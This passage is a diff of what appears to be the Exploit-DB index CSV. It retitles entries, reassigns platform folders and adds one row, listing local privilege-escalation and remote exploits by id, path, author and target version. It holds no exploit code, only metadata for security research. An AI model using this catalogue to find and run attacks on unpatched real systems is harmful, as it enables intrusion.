(SEH)",2013-10-14,metacom,windows,local,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0 -40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0 +40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 @@ -8542,7 +8543,7 @@ id,file,description,date,author,platform,type,port 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 -39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0 +39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0 @@ -8555,22 +8556,22 @@ id,file,description,date,author,platform,type,port 40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0 39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 -39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 -39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 +39432,platforms/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local,0 +39433,platforms/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0 -39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 +39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0 -39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 +39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0 -39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 +39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 @@ -8672,13 +8673,13 @@ id,file,description,date,author,platform,type,port 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 -40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 +40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0 -40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0 +40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0 -40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0 +40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0 40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0 40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0 40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0 @@ -8709,7 +8710,7 @@ id,file,description,date,author,platform,type,port 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 -40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0 +40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 @@ -8717,13 +8718,13 @@ id,file,description,date,author,platform,type,port 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0 -40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0 +40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0 40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 -40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 +40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0 -40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 +40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 @@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port 40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 -40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0 +40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0 40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0 @@ -8751,7 +8752,7 @@ id,file,description,date,author,platform,type,port 40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0 -40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 +40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 @@ -8769,9 +8770,10 @@ id,file,description,date,author,platform,type,port 41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0 41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0 41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0 -41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0 +41171,platforms/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0 41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0 41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0 +41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -8812,7 +8814,7 @@ id,file,description,date,author,platform,type,port 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 -67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 +67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21 @@ -8851,7 +8853,7 @@ id,file,description,date,author,platform,type,port 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 -132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80 +132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 @@ -8979,7 +8981,7 @@ id,file,description,date,author,platform,type,port 581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 -584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 +584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 @@ -9030,7 +9032,7 @@ id,file,description,date,author,platform,type,port 758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80 +764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,unix,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 @@ -9156,7 +9158,7 @@ id,file,description,date,author,platform,type,port 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722 +1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0 @@ -9429,7 +9431,7 @@ id,file,description,date,author,platform,type,port 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 -3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 +3680,platforms/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0 3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0 @@ -9444,7 +9446,7 @@ id,file,description,date,author,platform,type,port 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 -3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0 +3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 @@ -9473,7 +9475,7 @@ id,file,description,date,author,platform,type,port 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0 -3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80 +3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 @@ -9509,7 +9511,7 @@ id,file,description,date,author,platform,type,port 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 -4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 +4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80 4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 @@ -9620,7 +9622,7 @@ id,file,description,date,author,platform,type,port 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control 